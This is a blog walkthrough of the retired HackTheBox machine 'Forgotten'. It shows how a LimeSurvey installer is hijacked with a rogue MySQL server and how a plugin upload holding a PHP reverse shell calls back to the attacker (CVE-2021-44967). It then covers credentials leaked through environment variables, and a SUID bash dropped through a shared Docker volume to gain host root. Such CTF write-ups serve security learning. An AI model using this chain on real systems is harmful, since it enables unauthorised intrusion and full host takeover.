Skip to main content
HashnodeExploitNotesExploitNotes

Command Palette

Search for a command to run...

Hackthebox: Forgotten Writeup

Updated
6 min read
Hackthebox: Forgotten Writeup
Y
Yogesh Peela
I write detailed writeups on HackTheBox, PicoCTF and other CTF challenges. Passionate about web exploitation, Active Directory attacks and ethical hacking
Part of seriesHackTheBox Writeups

Summary

Forgotten is a HckTheBox machine centered around an exposed LimeSurvey installer endpoint that was never properly secured post-deployment. By spinning up a rogue MySQL server, an attacker can hijack the installation process to create a fresh admin account on the target's LimeSurvey instance. From there, a known RCE vulnerability (CVE-2021-44967) in LimeSurvey's plugin upload feature grants a foothold inside a Docker container. Environment variable leakage exposes the container user's password, allowing lateral movement to the host OS via SSH. Finally, a mounted Docker volume shared between the container and the host enables a classic SUID bash privilege escalation to achieve root on the underlying system.

Reconnaissance

Port Scan

nmap -sC -sV -A <MACHINE-IP> -oA nmap

Open ports:

Port Service Version
22 SSH OpenSSH 8.9p1 (Ubuntu)
80 HTTP Apache 2.4.56 (Debian)

The HTTP root returns a 403 Forbidden. The Server header leaks Apache/2.4.56 (Debian) and the nmap host info reveals the internal Docker IP 172.17.0.2, hinting at a containerized web application.

Directory Enumeration

ffuf -u http://forgotten.vl/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Key finding:

survey    [Status: 301]

Browsing to http://forgotten.vl/survey reveals a LimeSurvey application.

Initial Access

Stage 1 - Exploiting the Exposed LimeSurvey Installer

Navigating to http://forgotten.vl/survey/index.php?r=installer/precheck showed that the LimeSurvey installer was still accessible and had not been removed after deployment — a critical misconfiguration.

Pre-installation check (Step 3) leaked the version:

LimeSurvey 6.3.7

A quick search revealed CVE-2021-44967 — an authenticated RCE via plugin upload in LimeSurvey. The catch: admin access is required. The installer gave a path to create our own admin account.

Stage 2 - Rogue MySQL Server

The installer's Step 4 (Database Configuration) asks for a database host. Since we control what host the target application connects to, we stood up our own MySQL server:

docker run -p 3306:3306 --rm --name evil-mysql \
  -e MYSQL_ROOT_PASSWORD=pass123 mysql:latest

Verified it was listening:

netstat -tanp | grep -i list
# tcp  0.0.0.0:3306  LISTEN  docker-proxy

In the installer form (Step 4 — Configuration), we provided:

Field Value
Database type MySQL
Database location <YOUR-IP>:3306 (our Kali IP)
Database user root
Database password pass123
Database name test
Table prefix lime_

Proceeding to Step 5, the installer reported "Database doesn't exist" and offered to create it — we clicked Create database, which our rogue MySQL accepted. After clicking Populate database, Step 6 (Administrator Settings) appeared, letting us set a known admin password.

Installation completed successfully with our own admin credentials.

Stage 3 - RCE via LimeSurvey Plugin Upload (CVE-2021-44967)

With admin access at http://forgotten.vl/survey/index.php/admin/authentication/sa/login, we exploited the plugin upload functionality.

Crafted a malicious plugin archive:

config.xml:

<?xml version="1.0" encoding="UTF-8"?>
<config>
    <metadata>
        <name>ExamplePlugin</name>
        <type>plugin</type>
        <author>exploitnotes</author>
        <version>1.0</version>
        <description>Example Plugin</description>
    </metadata>
    <compatibility>
        <version>6.3</version>
    </compatibility>
</config>

rev-shell.php: A standard PHP reverse shell (pentestmonkey) pointing back to <YOUR-IP>:4444.

zip evil.zip rev-shell.php config.xml

Upload steps:

  1. Navigate to Configuration → Plugins → Upload & Install
  2. Upload evil.zip
  3. Confirm installation
  4. Start a netcat listener: nc -lvnp 4444
  5. Trigger the shell: curl http://forgotten.vl/survey/upload/plugins/ExamplePlugin/rev-shell.php

Shell received:

limesvc@efaa6f5097ed:/$ whoami
limesvc
limesvc@efaa6f5097ed:/$ id
uid=2000(limesvc) gid=2000(limesvc) groups=2000(limesvc),27(sudo)

Post-Exploitation

Docker Container Confirmation

The presence of /.dockerenv and the hostname efaa6f5097ed, combined with the ifconfig output showing inet 172.17.0.2, confirmed we were inside a Docker container — not the host OS directly.

Credential Discovery via Environment Variables

limesvc@efaa6f5097ed:/$ env

The environment dump revealed:

LIMESURVEY_ADMIN=limesvc
LIMESURVEY_PASS=5W5HN4K4GCXf9E

These credentials were baked into the container at build time.

Sudo Escalation Inside Container

sudo -l
# (using LIMESURVEY_PASS as password)
# User limesvc may run the following commands: (ALL : ALL) ALL

sudo -i
root@efaa6f5097ed:~#

Root inside the container — but still containerized.

Host Escape & Privilege Escalation

Volume Mount Enumeration

Inspecting mounts revealed a bind mount:

/dev/root on /var/www/html/survey type ext4 (rw,relatime...)

The container's /var/www/html/survey directory was mounted read-write from the host at /opt/limesurvey. Crucially, files written inside the container appear on the host with their original permissions — including SUID bits.

SUID Bash Binary Drop

From inside the container (as root):

cp /bin/bash /var/www/html/survey/bash
chmod +s /var/www/html/survey/bash

SSH to Host

The credentials discovered in the container's environment also worked for SSH on the host:

ssh limesvc@forgotten.vl
# Password: 5W5HN4K4GCXf9E

User flag obtained:

limesvc@forgotten:~$ cat user.txt
[REDACTED]

Root via SUID Bash

The SUID bash binary dropped through the shared volume appeared at /opt/limesurvey/bash on the host:

limesvc@forgotten:/opt/limesurvey$ ./bash -p
bash-5.1# whoami
root
bash-5.1# cat /root/root.txt
[REDACTED]

Attack Chain

Exposed LimeSurvey installer (/survey/index.php?r=installer)
        │
        ▼
Rogue MySQL server → hijack DB config step → create admin account
        │
        ▼
Authenticated as admin → CVE-2021-44967 plugin upload RCE
        │
        ▼
Shell as limesvc inside Docker container
        │
        ▼
Environment variables leak LIMESURVEY_PASS
        │
        ▼
sudo -i → root inside container
        │
        ▼
Shared volume (/var/www/html/survey ↔ /opt/limesurvey) → drop SUID bash
        │
        ▼
SSH to host as limesvc → ./bash -p → root on host

Key Vulnerabilities

# Vulnerability Impact
1 Exposed installer endpoint — LimeSurvey installer left accessible in production Allows full application reinstallation and admin account creation
2 Rogue database server acceptance — installer trusts any externally provided DB host without validation Enables attacker to supply and control the database
3 CVE-2021-44967 — LimeSurvey ≤ 6.3.7 authenticated RCE via plugin upload Remote code execution as web server user
4 Credentials in environment variablesLIMESURVEY_PASS exposed via env inside container Password reuse enables SSH access to host
5 Docker volume shared with host (rw) — container web root bind-mounted to host filesystem Container escape via SUID binary drop
6 SUID bash privilege escalation — arbitrary file write as container root → SUID bash on host Full host root access
#hackthebox#docker#ctf-writeup#ssh#credential-reuse
2 views

Comments

Join the discussion

No comments yet. Be the first to comment.

HackTheBox Writeups

Part 11 of 12

Detailed walkthroughs of retired HackTheBox machines covering web exploitation, ActiveDirectory attacks, privilege escalation and more. Every machine is fully compromised and documented step by step.

Up next

HackTheBox: Bamboo Writeup

Summary Bamboo is a HackTheBox machine that chains together a Squid proxy pivot, an authentication bypass in PaperCut NG (CVE-2023-27350), and a PATH hijack privilege escalation to reach root. The exp

More from this blog

E

ExploitNotes

25 posts